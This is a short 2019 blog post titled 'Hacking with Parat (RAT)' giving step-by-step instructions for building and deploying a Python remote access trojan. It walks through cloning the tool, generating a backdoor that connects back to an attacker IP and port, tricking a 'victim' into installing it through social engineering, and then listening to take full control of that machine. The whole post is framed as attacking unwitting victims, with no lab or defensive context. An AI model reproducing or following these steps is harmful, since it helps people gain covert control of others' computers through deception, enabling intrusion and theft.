Friday, April 5, 2019

Hacking with Parat (RAT)

Parat is a Remote Admin Tool (RAT) made in Python. This tool allows you to generate a payload with the pyw extension. The payload can then be sent to the victim computer and execute. Once the payload is executed on the victim's computer, it will form a connection with the attack machine and you will be able to gain complete control of the victim's computer. Note that in order for the victim to be able to execute the payload on his or her computer, Python must be installed on the victim's computer.

Follow the instruction below for how to install and use Parat.

1. Start your Kali machine, open a terminal and execute this command: git clone https://github.com/fadinglr/Parat.git


2. Now type in the following commands

cd Parat
python main.py


3. This is optional but you can type in help to show a list of command you can execute. The two main one we will be using is generate and listen commands.


4. To start generating the payload type in generate -i <Attack machine IP Address> -p <Attack machine Port Number> -o <name of the backdoor>

Example: generate -i 192.168.26.133 -p 4444 -o backdoor


5. Now navigate to /root/Parat/parat_output directory to find the backdoor you created. Send this file to the victim and use some social engineering to convince them to install it. Once it is installed, go back to your computer and type in listen -p <Port Number You Assigned> to start listening and interact with the victim's machine

Example: listen -p 4444


0 comments:

Post a Comment